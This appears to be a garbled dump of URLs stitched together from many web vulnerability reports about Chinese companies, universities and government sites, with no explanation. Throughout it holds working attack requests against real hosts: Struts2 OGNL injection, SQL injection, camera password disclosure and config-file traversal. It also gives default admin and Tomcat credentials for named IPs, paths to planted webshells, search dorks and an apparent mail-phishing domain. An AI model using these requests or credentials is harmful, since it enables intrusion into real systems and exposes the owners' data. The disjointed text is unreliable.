http://qd.daoxila.com/hotel/all-image?id=1201 http://101.227.8.73/login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://www.zjhz.cn/ http://www.hzwjls.com/cpinfo.asp?productsort=1&id=13 http://www.hzylfz.com/cpinfo.asp?productsort=1&id=22 http://www.hz-hg.cn/cpinfo.asp?id=149 http://www.ruiyangchemical.com/cpinfo.asp?id=13 http://hzhiger.com/cpinfo.asp?productsort=9&id=88 http://hz-zhiguan.com/cpinfo.asp?productsort=34&id=55 http://www.hz-mingda.com/cpinfo.asp?productsort=6&id=6 http://www.hzmelux.com/cpinfo.asp?productsort=7&id=129 http://www.hzxj.com/cpinfo.asp?productsort=2&id=12 http://www.mm-jixie.com/cpinfo.asp?productsort=20&id=215 http://www.hzshjx.com/cpinfo.asp?id=67 http://www.bx-hardware.com/cpinfo.asp?id=244 http://www.dadazipper.com/cpinfo.asp?productsort=8&id=619 http://www.hzjdjd.com/cpinfo.asp?productsort=3&id=72 http://www.hztlsilk.com/old/cpinfo.asp?productsort=6&id=58 http://www.hzmiaoda.com/cpinfo.asp?productsort=59&id=317 http://www.hzhiger.com/cpinfo.asp?productsort=7&id=193 http://www.hz-zhiguan.com/cpinfo.asp?productsort=23&id=37 http://www.hzylfz.com/cpinfo.asp?productsort=1&id=26 http://www.hzjdjd.com/cpinfo.asp?productsort=1&id=312 http://220.181.116.154/framework/global/login.jsp?source=index http://220.181.116.154/base/permission/cache/cacheInfoIndex.action WebSite:http://nmg.wo.com.cn/index.action http://www.gzhbw.gov.cn/web.rar https://s.huobi.com/?a=do_buy http://xtj.dajie.com/wx/xtj/109/referee/join?type=3&uid=30131111 http://www.ssap.com.cn/skwx/periodical/Period_annualCont.aspx?qik_id=20130527175674 http://202.118.65.18:9090/ http://www.yxcms.net/ http://demo.yxcms.net/index.html http://jwtz.ndrc.gov.cn/jwtz-ex/index.action encap:Ethernet FB:DA:59:80 addr:192.168.60.12 Bcast:192.168.60.255 Mask:255.255.255.0 fbff:feda:5980/64 Scope:Link MTU:1500 packets:23002286 packets:28848661 txqueuelen:1000 http://www.scett.bnu.edu.cn/NewsList.aspx?first=self_examination&second=tongzhifabu&page=1 http://www.scett.bnu.edu.cn/News.aspx?first=xinxizhongxin&second=xueyuangonggao&id=2196 http://www.scett.bnu.edu.cn/Channel.aspx?first=aboutus http://mail.tj.ct10000.com http://mail.cnbg.net/webmail/getPass.php?email=10000@mail.tj.ct10000.com&update=s http://wooyun.org/bugs/wooyun-2010-061859 http://www.junfang.com.cn/bigSortProduct.asp?bigid=180 http://www.junfang.com.cn/productShow1.asp?id=1292 http://www.junfang.com.cn/newsshow.asp?newsID=114 http://www.junfang.com.cn/bigSortProduct.asp?bigid=180 http://www.mgc.ac.cn/ http://www.mgc.ac.cn/cgi-bin/VFs/compvfs.cgi?Genus=Mycobacterium www.qycn.com http://www.wdghy.com/wdghyhd/register2.jsp?type=1 http://www.wdghy.com/wdghyhd/uploadfile.jsp?method=goFileUpload&fileType=jpg&maxSize=5&eleid=businesslicense&abc=0.18216927155681018 http://www.vans-china.cn http://220.***.***.*4/jisuanjiedian.html http://***.letv.com/ http://115.***.***.1*/ http://115.***.***.*7:8080/login http://115.***.***.1*/login http://115.1***.***3.1*:8080/ http://115.1***.***.*9/login.action http://115.1***.***2.*7/ http://sts.gzsti.gov.cn/Map.aspx?Big=5 http://sts.gzsti.gov.cn/Display.aspx?TID=01 http://sts.gzsti.gov.cn/Display.aspx?TID=01 http://sqlmap.org http://rccsh.sxu.edu.cn/newsbook.asp?classid=76&newsid=681 http://rccsh.sxu.edu.cn/class.asp?classid=69 http://rccsh.sxu.edu.cn/picshow.asp?id=262 http://59.149.83.240/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount http://101.78.142.10/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount http://218.253.245.125/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount http://59.149.83.240/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount http://113.255.93.243cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount https://members.qidian.com.tw/apps/login.php http://www.cqjcy.gov.cn/rmjd/EmailToSuperVion.asp?id=2112 http://www.sdggcyfw.com/news/newscontent.aspx?id=9758 http://218.94.17.130:8002/download/ http://218.94.17.130:8002/download/%e5%88%9b%e6%96%b0%e7%bb%84%e4%b8%93%e7%94%a8/%e6%9c%b1%e7%8e%89%e5%86%9b%e7%a6%bb%e8%81%8c%e4%ba%a4%e6%8e%a5/D%e7%9b%98%e9%a1%b9%e7%9b%ae/%e9%a1%b9%e7%9b%ae/ http://218.94.17.130:8002/download/%e5%88%9b%e6%96%b0%e7%bb%84%e4%b8%93%e7%94%a8/%e6%9c%b1%e7%8e%89%e5%86%9b%e7%a6%bb%e8%81%8c%e4%ba%a4%e6%8e%a5/ http://bar.2144.cn/user/register这个链接下注册却需要填写邮箱 http://game.news.cn/shouyou/game_details.jsp?gameid=33582 http://210.13.199.11/ http://kfxsy.nchu.edu.cn:88/newsdetails.aspx?NewsId=20 http://www.hnrku.net.cn/kszx/NewsList.aspx?lbid=1210 http://www.hnrku.net.cn/jjjc/gly/admin/BoardView.asp?id=40 http://www.ehome10000.com http://www.ehome10000.com/SQISoft/Web/CustCenterPurchaseOrder.aspx http://suining.ehome10000.com/SQISoft/Web/CustCenterPurchaseOrder.aspx http://www.e***.net/airticket/policyOrder!details.shtml?operate=edit&ddbh=1308201407032511&type=1 http://www.e***.net/airticket/policyOrder!details.shtml?operate=edit&ddbh=1309300928106175&type=1 http://www.e***.net/airticket/policyOrder!details.shtml?operate=edit&ddbh=130125190937562&type=1 http://www.e***.net/airticket/reportAll/salesReportAll.jsp?cggy=2 http://sjc.sqc.edu.cn/manage/news-manage!newslist.action http://60.171.18.27/teachweb/WebFormResetPassword.aspx http://202.198.0.40:7925/teachweb/WebFormResetPassword.aspx http://sdjw.syu.edu.cn/WebFormResetPassword.aspx http://jwc.nchu.edu.cn/teachweb/WebFormResetPassword.aspx http://ice.sqc.edu.cn/admin/default.asp http://hr.snda.com/wintalent3/SNDA/web/index http://cmc.ncepu.edu.cn/showequpic.asp?id=83 http://cmc.ncepu.edu.cn/huan.asp?id=17 http://cmc.ncepu.edu.cn/showshuoming.asp?id=5 http://cmc.ncepu.edu.cn/equipments.asp?leibie=&page=2 http://electric.ncepu.edu.cn:7010/Notice.aspx?id=1 http://whdkj.gov.cn http://zb.muc.edu.cn/svlcontent?action=FETCH_CONTENT&content_id=1082 http://cwcx.muc.edu.cn/newsContent.aspx?contentID=269&ClassID=17 http://xyb.cupl.edu.cn/Alumni_Profiles.aspx?stype=10 http://xyb.cupl.edu.cn/Alumni_news.aspx?id=329 http://xyb.cupl.edu.cn/Alumni_mien.aspx?id=314 http://zhaopin.cau.edu.cn/showPolicyBulletinDetail.php?type=1&id=74 http://www.lib.cau.edu.cn/news/show_newss.html?id=1488 data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpIDwvc2NyaXB0Pg== http://www.njgjj.com/skywcm/query/gjj_query/gjjlogin.jsp http://124.133.2.2/siteserver/login.aspx http://58.251.145.106/ http://210.13.199.140/acc/accountQry.action?openid=****** http://210.13.199.140/acc/accountQry.action http://iamc.fzu.edu.cn/admin/index.php http://map.qq.com/ http://124.42.45.165/logon.aspx http://202.99.59.114:8080/ http://202.99.59.114:8080/MHJC/ http://202.99.59.114:8080/aaep-manager/ userid:2988294 userid:2988309 http://jpkc.gmc.edu.cn/ http://jpkc.gmc.edu.cn/页面) http://58.251.151.40/ http://58.251.151.40/everBrightInt/sys/request/getbackpassword.request http://116.228.55.189:8887/blazerV4.3/turnLoginAction.do?action=login&username=test&password=1111111&uname=1111&_out=json&_dc=1412066658660&callback=stcCallback1001 http://kf.bestpay.com.cn:8887/blazerV4.3/index.jsp,暂时没找到其他使用这个系统的 http://IP:8887/blazerV4.3/product/runPageAction.do?action=open&page=352&id=61 inurl:download.jspx?path= www.xxczj.gov.cn/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml www.zzcz.gov.cn/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml http://www.ncnynm.com/ http://www.bjwh.gov.cn/cms/jsp/culture/CULPINFO_qiye_select.jsp http://www.bjwh.gov.cn/cms/jsp/culture/CULPINFO_select.jsp http://www.ccgp-jiangsu.gov.cn:8081/carxygh/carSeach.do?car_manufacturers=122 http://drops.wooyun.org/papers/548 http://59.50.33.86:9000/login/login.php http://58.220.225.28:8080/login/login.php http://58.220.225.28:8080/login/login.php http://prm.chanjet.com/login/login.php http://222.41.174.190:8088/login/login.php http://crm.pearmain.cn/login/login.php http://crm.transn.net/login/login.php http://crm7.abgroup.cn/login/login.php http://crm.elfa.com.cn/login/login.php http://nc.shineroad.com/login/login.php http://crm.westernpower.cn/login/login.php http://crm.siweidg.com/login/login.php http://crm.shineroad.com/login/login.php http://114.242.164.151:8080/login/login.php http://www.herenpearl.com:9000/login/login.php http://crm7.cfldcn.com:8090/login/login.php http://crm.westernpower.cn/login/login.php http://crm1.szreach.com/login/login.php http://crm1.nj-int.com.cn/login/login.php http://crm.servodynamics.com.cn:8088/login/login.php http://yindajituan.gicp.net:8888/index.php http://crm.llll.com.cn/login/login.php(该域名略屌) http://crm.zooren.com/login/login.php http://59.50.33.86:9000/login/forgetpswd.php?orgcode=admin&loginname=admin* http://nc.shineroad.com/login/forgetpswd.php?orgcode=admin&loginname=admin* http://crm.westernpower.cn/login/forgetpswd.php?orgcode=admin&loginname=admin* http://crm.llll.com.cn/login/forgetpswd.php?orgcode=admin&loginname=admin* http://crm.servodynamics.com.cn:8088/login/forgetpswd.php?orgcode=admin&loginname=admin* http://wooyun.org/bugs/wooyun-2014-072520 http://wooyun.org/bugs/wooyun-2014-072520 http://www.lijiang-airport.com asp:123*123 asp:admin asp:admin asp:caonima(密码亮了) http://www.strongsoft.net/ http://www.ghqy.cc/manage/Admin_List.aspx http://www.ghqy.cc/manage/Admin_Add.aspx?id=2 http://www.zyhcwq.com/manage/Admin_List.aspx http://www.zyhcwq.com/manage/Admin_Add.aspx?id=2 http://www.gzysljj.com/manage/Admin_List.aspx http://www.gzysljj.com/manage/Admin_Add.aspx?id=2 http://www.bjzj.gov.cn/manage/Admin_List.aspx http://www.bjzj.gov.cn/manage/Admin_Add.aspx?id=2 http://www.1yh1.com/manage/Admin_List.aspx http://www.1yh1.com/manage/Admin_Add.aspx?id=2 http://www.hcqrs.gov.cn/manage/Admin_List.aspx http://www.hcqrs.gov.cn/manage/Admin_Add.aspx?id=2 http://gzxpjkq.com/manage/Admin_List.aspx http://gzxpjkq.com/manage/Admin_Add.aspx?id=2 http://www.gzztgs.com/manage/Admin_List.aspx http://www.gzztgs.com/manage/Admin_Add.aspx?id=2 http://www.gzhtjl.com/manage/Admin_List.aspx http://www.gzhtjl.com/manage/Admin_Add.aspx?id=2 http://1yh1.com/manage/Admin_List.aspx http://1yh1.com/manage/Admin_Add.aspx?id=2 http://www.zydfjx.com/manage/Admin_List.aspx http://www.zydfjx.com/manage/Admin_Add.aspx?id=2 http://mail.pbcti.cn/webmail/login9.php http://gongxiao.cj.gov.cn http://mail.gsepdi.com:8080/webmail/getPass.php?email=gsepdi@gsepdi.com&update=s http://www.gsepdi.com:8080/webmail/client/cache/6/14120901895.jpg/.php http://mail.lotustv.cc/ http://wooyun.org/bugs/wooyun-2010-061894 http://wooyun.org/bugs/wooyun-2010-061859 http://mail.coes.org.cn/webmail/client/cache/324/14120865545.jpg/1.php http://www.coes.org.cn/rollbook/default.asp http://www.czzfgjj.com.cn http://db.178.com/lol/ http://gdue.cumt.edu.cn/jijin/newsshow.asp?id=466 http://sist.swjtu.edu.cn/XYGK/teachers/infoshow.asp?id=1096 inurl:/custom/GroupNewsList.aspx http://epstest.chinajiutai.com/ http://eps.hjgrp.com/ http://trademb.lgmi.com/ http://www.dmegc.net/ http://eps.chinajiutai.com/ http://eps.delongsteel.com/ http://eps.xinjinsteel.com/ http://www.qlszb.com/ http://eps.gfgt.com/ http://eps.sinoma-cem.cn/ http://eps.xltl.com.cn/ http://imtrademb.lgmi.com/ http://60.213.35.133:81/ http://www.sdlg.info/ http://58.218.196.218:90/ http://ygcg.xuangang.com.cn/ http://ebidding.renesola.com/ http://eps.eastcom.com/ http://www.lzpbzx.com/ http://em.giti.com/ http://bid.hong-lu.com:82/ http://azbid.zj31.com.cn/ http://eps.hjgrp.com/ http://epstest.chinajiutai.com/ http://eps.hjgrp.com/ http://trademb.lgmi.com/ http://www.dmegc.net/ http://eps.chinajiutai.com/ http://www.turbomail.org/download.html inurl:/zjwd.aspx?TemplateType= http://la.ahnw.gov.cn/aspx/zjwd.aspx?TemplateType=3&Id=ED5AB424-44B5-4583-8AE1-9ECB34822EF8 http://chz.ahnw.gov.cn/aspx/zjwd.aspx?TemplateType=3&Id=ED5AB424-44B5-4583-8AE1-9ECB34822EF8 http://szsx.ahnw.gov.cn/aspx/zjwd.aspx?TemplateType=3&Id=ED5AB424-44B5-4583-8AE1-9ECB34822EF8 http://xc.ahnw.gov.cn http://hn.ahnw.gov.cn http://bb.ahnw.gov.cn http://szsx.ahnw.gov.cn http://chz.ahnw.gov.cn http://qy.ahnw.gov.cn http://szlb.ahnw.gov.cn http://bz.ahnw.gov.cn http://tl.ahnw.gov.cn http://sc.ahnw.gov.cn http://hsnw.ahnw.gov.cn http://la.ahnw.gov.cn http://www.nssc.org.cn/TBulletAction1/showTBulletDetails.action http://wooyun.org/bugs/wooyun-2010-061894 http://mail.jzbank.net/webmail/client/cache/8/14112662048.jpg/1.php http://sites.sdjzu.edu.cn/jiaomingqi/wgjzs.asp?id=53 http://222.211.85.90:8080/LMS/ http://isfashion.com/isfashion.zip http://k.yiban.cn/index.php?c=useredit&a=stuDetail&uid=3178 http://jky.gznu.edu.cn/news.asp?id=1260 http://crm.7daysinn.cn/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=E:/webs http://www.jnrsks.gov.cn/UpLoadFiles/Contents/2014-9/2014090216085611701.xls http://www.jnrsks.gov.cn/UpLoadFiles/Other/2012-8/2012082416582290345.xls http://edu.baidu.com http://edu.baidu.com/marketing2014/UserLogin.aspx http://edu.baidu.com/marketing2014/UserLogin.aspx http://edu.baidu.com/marketing2014/UserLogin.aspx http://edu.baidu.com/marketing2014/admin/login.aspx http://auto.ynet.com/cgi/subbrand.php?subid=13 http://cbi.hzau.edu.cn/cgi-bin/CRISPR http://others.enet.com.cn/research/research_result.php http://others.enet.com.cn/research/config.php http://www.hclr.gov.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20%20CONCAT%28md5%283134%29%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://www.jzglz.suzhou.gov.cn/InitAction_toIndex.action http://www.xaepb.gov.cn/ajax/comm/attach/downloadFile.jsp?sPath=NewAtta&trid=6939 http://dep.gduf.edu.cn/xctz/Main_toIndex.action http://search.dangdang.com/?key=test http://geekfree.sinaapp.com\ http://jwc.buu.edu.cn/message/message/goTypeList.jhtml?type=c1001 http://bjcac.buu.edu.cn/?l=one&id=2&t=1412085004 http://bjcac.buu.edu.cn/?l=news&id=97 http://yanzhao.bsu.edu.cn/chname.asp?user_id= http://dx.uibe.edu.cn/list_new.asp?bid=97&dir=dxgk http://dx.uibe.edu.cn/list_new.asp?bid=&id=&dir=djdt http://dx.uibe.edu.cn/list_new.asp?bid=120&id=79 http://mbaxsxt.uibe.edu.cn/TeachingClass.aspx?t=3 http://www.tcl.com/admin.php/Public/login http://sms.rdfzxishan.cn/serverlog.do http://sms.rdfzxishan.cn/index.do http://www.thjdpx.org/entity/first/firstInfoNews_toIndex.action http://202.38.194.204:8080/epsu_08/wbo/ http://202.38.194.204:8080/epsu_08/wbo/FCKeditor/_whatsnew.html http://www.cysjw.gov.cn/manage/index.asp http://www.cyzffz.gov.cn/admin/main.asp http://www.cysl.gov.cn/news/admin/admin.asp http://cmis.bhfz.com/cmis40/ http://www.cs2c.com.cn/view.php?id=33&type=file&module=download www.ycpai.com http://www.ycpai.com https://mail.cs2c.com.cn/nsmail.zip http://osc.cs2c.com.cn/forum/ demo:http://gov.tongda2000.com/ http://gov.tongda2000.com/vote/default/showvote/id/4/isopen/1 http://www.spprec.com/scztb/fckeditor/editor/fckeditor.html http://220.181.109.229/qisu/login http://220.181.109.218:8080/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://xxx/email/setting/other?box_id=1 http://osc.cs2c.com.cn/forum/index.php https://github.com/insekkei/os-cs2c-backup/blob/7d768e509d050d76daaf7c56a63790055e703b9f/html/forum/upload/uc_server/data/config.inc.php http://fmi.com.cn/web.zip http://www.kuihua.net/ http://www.china-cet.com/zhutineirong.php?id=23 http://www.vbmcms.com/ http://city.vbmcms.com http://city.vbmcms.com/wap/index.php http://sqlmap.org http://jwgl.hrbcu.edu.cn/ACTIONSHOWINFO.APPPROCESS?mode=4&size=10 http://jyw.hrbcu.edu.cn/jyw/inc_infoshow.asp?incid=176 http://neocertify.cs2c.com.cn/fckeditor/editor/dialog/fck_about.html http://portal.cdpf.org.cn/sysmgr/ inurl:Exam/Default.aspx http://www.jhpx.com:8002/exam/default.aspx www.yzxxc.gov.cn/Exam/Default.aspx http://www.sxxsdxf.cn/Exam/Default.aspx http://www.sxxsdxf.cn/Exam/Default.aspx http://www.csstudy.gov.cn/Exam/Default.aspx http://www.jhpx.com:8002/exam/default.aspx http://www.yzxxc.gov.cn/Exam/Default.aspx http://www.sxxsdxf.cn/Exam/Default.aspx http://www.whce.gov.cn/Exam/Default.aspx http://gbjy.yw.gov.cn/Exam/Default.aspx http://www.yulinstudy.gov.cn/Exam/Default.aspx http://www.0575study.gov.cn/Exam/Default.aspx http://www.csstudy.gov.cn/Exam/Default.aspx http://wssy.hnsy.org.cn/Exam/Default.aspx http://www.ndgb.gov.cn/Exam/Default.aspx http://zhejian.com/cmp/sfcx_zy.asp?hyxh=12 http://zhejian.com/cmp/sfcx_zy.asp?hyxh=12 http://app.games.renren.com/tags.php?tag=航海之王 http://app.games.renren.com/tags.php?tag=航海之王Ž‹ http://app.games.renren.com/tags.php?tag=航海之王Ž‹ http://map.qq.com/ http://www.guqiu.com/ http://demo.guqiu.com/管理地址http://demo.guqiu.com/admin/用户帐号admin用户密码guqiu.com都在互动程序这个地方 http://demo.guqiu.com/document-12-68.aspx http://www.ccw.com.cn/article/view/75836 http://www.18bg.com/ http://www.chemdb-portal.cn/cmsmember/LoginAloneInput.jspx http://www.hebwj.gov.cn/ http://www.hebwj.gov.cn/template/jgsf.asp?lmlb=F&lmdm=34&tmxh=000000000476 cn:40000 http://202.207.240.57/ http://v3.fnuo123.com/admin123/index.php http://kxrj.guet.edu.cn/guestBook2.aspx?class=11 http://kxrj.guet.edu.cn/guestBook.aspx?class=11 http://apzx.hpu.edu.cn/x.asp http://jt.stdusfc.cn/admin/index.php http://jt.stdusfc.cn//uploads/images/M.php http://www.dfcms.net/acAdmin/acAdminLogin.jsp www.jwc.bupt.cn https://blog-supericybee.rhcloud.com/?p=36 http://club.autohome.com.cn/bbs/thread-c-3313-32393289-1.html http://club.autohome.com.cn/bbs/thread-c-3451-30785597-1.html http://211.90.75.34/login.jhtml# http://kf2.meizu.com/iframe_brief.php?style_id=103301880&language=cn http://kf2.meizu.com/iframe_brief.php?style_id=103301880 http://kf2.meizu.com/iframe_brief.php?style_id=103301880 http://www.ickey.cn/2013/stock/search.html?sub2=9&kw=100K%CE%A9&Passiveproduct_page=2 http://www.ickey.cn/2013/stock/search.html?sub2=9&sub3=10&pro_precision=%C2%B11%25 http://www.suyaxing.com/ http://www.iyaya.com/msg/inbox.php http://apps.lib.whu.edu.cn/newbook/show.asp?a=577374 http://gbpx.jlu.edu.cn/gbpx/All/UserMessageInfo1.php?id=10 url:http://58.222.198.202:8000/manager/html user:tomcat pass:tomcat http://58.222.198.202:8000/doApply?name=深蓝&villageF=321203103&villageS=3212031030005&income=100&money=1000&purpose=贩毒&profession=毒贩&address=上帝是女孩&tel=18888888888&email= url:http://221.226.100.162:8000/manager/html user:tomcat pass:tomcat http://www.jiuhu.com/message/login www.pishu.com.cn在同一服务器,容易猜出主站的物理路径~) http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449%27 http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449%27 url:http://121.17.35.196:8000/manager/html user:tomcat pass:tomcat url:http://121.28.149.166:8000/manager/html user:tomcat pass:tomcat url:http://121.28.148.43:8000/manager/html user:tomcat pass:tomcat google:THEOL网络教学综合平台,发现用这个平台的学校还真不少。 http://***/eol/common/mail/printmail.jsp?mailID=29944 http://***/eol/common/faq/forum.jsp?forumid=1 http://***/eol/common/forum/admin/permmanage.jsp?forumid=1(权限管理) http://www.phpok.com/phpok.html http://demo.phpok.com http://m.998.com http://localhost:81/iwebmall/modules.php?app=user_guestbook http://www.ztewelink.com/ http://baidu.com http://baidu.com http://baidu.com http://www.goutrip.com/ http://www.whnewnet.com/ http://www.twxj.com/news.asp?act=content&channelid=18&id=212 http://www.twxj.com/news.asp?act=content&channelid=18&id=212 http://www.whsuxing.com/news.asp?act=content&pid=124&channelid=124&id=317 http://www.hbjnpx.com/news.asp?act=list&pid=123&channelid=123 http://www.xinhuada9.com/news.asp?act=list&channelid=189 http://www.topping.com.cn/news.asp?act=content&channelid=2&id=8 http://www.whktzj.cn/news.asp?act=pro_d&channelid=5 http://www.whfzjt.com/ylsb/news.asp?act=content&channelid=2&id=9 http://www.hbflnet.com/news.asp?act=content&channelid=1&id=332 http://www.hbfuyuan.com/news.asp?act=content&channelid=36&id=61 http://www.yhrypx.com/news.asp?act=list&channelid=6 http://www.whleis.com/news.asp?act=list&pid=125&channelid=125 http://www.whhysx.com/news.asp?act=content&channelid=3&id=109 http://www.hzltravel.com/news.asp?act=content&channelid=1&id=264 http://hbjtshb.com/news.asp?act=content&pid=0&cid=11&id=127 http://www.whfzjt.com/news.asp?act=list&cid=23 http://www.whnewnet.com/ http://www.twxj.com/pic.asp?channelid=12 http://www.twxj.com/ http://www.whsuxing.com/ http://www.hbjnpx.com/ http://www.xinhuada9.com/ http://www.topping.com.cn/ http://www.whktzj.cn/ http://www.whfzjt.com/ http://www.hbflnet.com/ http://www.hbfuyuan.com/ http://www.yhrypx.com/ http://www.whleis.com/ http://www.whhysx.com/ http://www.hzltravel.com/ http://hbjtshb.com/ http://www.whfzjt.com/ http://hd.bitauto.com/activity/?id=45 http://data.auto.china.com/SearchAction.do?processID=search http://www.beida100.com/video_play.php?id=25688 http://www.cpis.com.cn/ http://www.cpis.com.cn//userLogin.do http://219.143.8.99/besweb/ http://219.143.8.99/besweb/admin/index.jsp URL:/member/o_upload_image.jspx http://10.10.10.136/dede/dede/tpl.php http://www.zx.scrcu.com.cn/(四川省农村信用社联合社:http://www.scrcu.com.cn/) http://115.182.6.10:8080/src/user.sql http://115.182.6.10:8080/src/ http://led.uni-digital.com.cn/login.action http://www.listentech.com.cn/login.action http://124.164.234.213:8080/login.action http://www.szfd.gov.cn/zjslnsjg.asp?SmallClassID=114&BigClassID=13 http://www.szfd.gov.cn/more_flfg.asp?SmallClassID=65&BigClassID=14 http://www.szfd.gov.cn/Disp_Feedback.asp?ID=5258&ProcessState=3 http://www.szfd.gov.cn/szfxnews.asp?NewsID=3417 http://www.szfd.gov.cn/news.asp?NewsID=3426 http://www.szfd.gov.cn/More_Feedback.asp?SortType=3 http://www.xhxqlgk.gov.cn/manage/login.asp http://www.midea.com/cn/promotion/app/2014/wish/shike.php api.php/upload http://www.midea.com/cn/promotion/app/2014/wish/uploads/shike/49aaff3781259b293c8885b010658cb4.gif%5Ca.php http://www.whnewnet.com/ http://www.twxj.com/cate.asp?act=list&channelid=21 http://www.twxj.com/ http://www.whsuxing.com/ http://www.hbjnpx.com/ http://www.xinhuada9.com/ http://www.topping.com.cn/ http://www.whktzj.cn/ http://www.whfzjt.com/ http://www.hbflnet.com/ http://www.hbfuyuan.com/ http://www.yhrypx.com/ http://www.whleis.com/ http://www.whhysx.com/ http://www.hzltravel.com/ http://hbjtshb.com/ http://www.whfzjt.com/ http://beauty.online.sh.cn/ http://wenzihui.co.jdzj.com/new_view.asp?id=121272 http://wenzihui.co.jdzj.com/new_view.asp?id=121272 http://metc.hynu.cn/wp/index.aspx http://metc.hynu.cn/wp/myfile/guest/abc/root.ashx http://metc.hynu.cn/wp/myfile/guest/abc/root.asp一句话木马地址 http://metc.hynu.cn/wp/myfile/guest/dama.asp大马 http://61.172.240.227:18264/ http://www.turbomail.org/ http://kdgj.cn http://218.205.119.37/ http://www.zju.edu.cn/service/open_service.php?cmd=chaka http://www.zju.edu.cn/service/open_service.php?cmd=chaka http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=(参数遍历) http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=44755 http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=44756 http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=44757 http://re.meizu.com/searchCenter/ActingDetail.aspx?Id=44758 http://www.lanzhourailwaybureau.com.cn/news_pic_dis.asp?x=522 http://222.86.207.241/Wxzj/RepairQuery/OwnerSearchByName.aspx http://www.dyfgs.com/Wxzj/RepairQuery/OwnerSearchByName.aspx http://www.ysfgj.com.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx http://www.zylzfc.cn/Wxzj/RepairQuery/OwnerSearchByName.aspx http://221.10.67.197/Wxzj/RepairQuery/OwnerSearchByName.aspx http://222.86.207.241/index.aspx http://kf2.meizu.com/iframe_logo.php?arg=meizu&style_id=103301880&is_zdylogo=1&style_hangye_id=0&logo_lock=0&proxy=&company_id=61397712&gggj_logo=0&key=1&ykey=1&is_yx=Y http://kf2.meizu.com/iframe_logo.php?arg=meizu&style_id=103301880 http://kf2.meizu.com/iframe_logo.php?arg=meizu&style_id=103301880 http://www.qdbofcom.gov.cn/2011nianjian/admin/AdminLogin.asp http://www.hizyy.com/shownews.php?catid=36&id=482 http://www.dreamsoft.in/ http://v.yyrtv.com/player.php?id=871 http://show.qzgb.com/player.php?id=871 http://video.nxtv.cn/player.php?id=871 http://tv.qzgb.com/player.php?id=871 http://v.snwh.gov.cn/player.php?id=871 http://v.zpbbs.cn/player.php?id=871 http://v.0937.net/player.php?id=871 http://ntzx.cn/player.php?id=871 http://tv.qzgb.com/player.php?id=871 http://v.cqtn.com/player.php?id=871 http://v.snwh.gov.cn/player.php?id=871 http://v.0937.net/player.php?id=871 http://ntzx.cn/player.php?id=871 http://show.qzgb.com/player.php?id=871 http://v.cqtn.com/player.php?id=871 http://www.sxsjky.com/Browse/NewsList.aspx?txtKeyword=a http://www.wooyun.org/bugs/wooyun-2014-077752/trace/721caa6272f35ba5b35ae695897195ad http://ecard.sdut.edu.cn/ http://ecard.bzmc.edu.cn/ http://ecard.sdca.edu.cn/ http://59.173.236.220/SelfSearch/Default.aspx http://202.115.192.98/SelfSearch/ http://ykt.szetop.com/SelfSearch/ http://yktweb.cqie.cn/default.aspx http://www.zhengzhong.cn/selfsearch/ http://221.224.167.141/selfsearch/ http://zzcx.scujjedu.cn:114/ http://202.101.244.45/selfsearch/ http://ecard.sdut.edu.cn http://ecard.sdut.edu.cn http://2012.edu.gd.chinamobile.com/newmh/home.do?action=index http://books.ssap.com.cn/MallStore/Store_BookList.aspx?bookclass=218 http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449 http://**.**.**/license!getExpireDateOfDays.action http://221.192.140.99:8080/admin/ http://un.koolearn.com/fckeditor/editor/filemanager/connectors/test.html# http://61.156.3.123:8080/partner/ url:http://218.10.187.143:8081/manager/html user:admin pass:admin http://218.10.187.143:8081/ncmsv4/main.html# http://n.bjtrm.com:7890/trmoto_ms/p.jsp http://n.bjtrm.com:7890/trmoto_ms/test4_.jsp http://www.mgc.ac.cn/cgi-bin/VFs/compVFs/compvfs.cgi?Genus=Mycobacterium http://office.189.cn/ http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!input.do http://office.189.cn http://microsites.audi.cn/2014ade/ade/register_init.action http://microsites.audi.cn/2014ade/2.txt http://mail.qq.com.cgi-bin.frame-html.siduz1gjqsctztfk8br0c141773e.x55.me http://en.mail.qq.com/cgi-bin/loginpage http://14.23.156.26:8090/YHSMSClient/login.action http://www.avepoint.com.cn/toolkit/adminlogin.php http://pa.jsict.com/globeyes/user/index.jsp http://pa.jsict.com:8080/globeyes/admin/ http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516 http://210.29.65.123:8082/ http://210.29.65.123:8081/ http://www.jsict.com/ http://www.pinganyun.cn:8000/jsp/findPassword/findPasswordSetp1.action http://ha.kandian.189.cn:8000/jsp/findPassword/findPasswordSetp1.action 